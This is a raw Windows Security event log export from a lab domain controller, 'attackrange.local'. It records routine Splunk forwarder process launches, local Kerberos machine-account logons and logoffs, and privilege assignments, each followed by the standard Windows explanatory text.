Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263918
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1080
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263917
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b90
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:35:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263921
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x782FC6
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:35:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263920
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x782FC6
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51653
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:35:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263919
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x782FC6
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263923
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1acc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263922
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xee8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263924
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263925
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263926
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263928
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1588
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263927
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1540
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:36:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263931
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x786B7A
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:36:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263930
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x786B7A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 51667
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:36:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263929
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x786B7A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:37:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263933
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1224
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:37:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263932
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x157c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:37:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263934
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa18
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:37:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263935
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:37:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263936
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263938
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263937
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
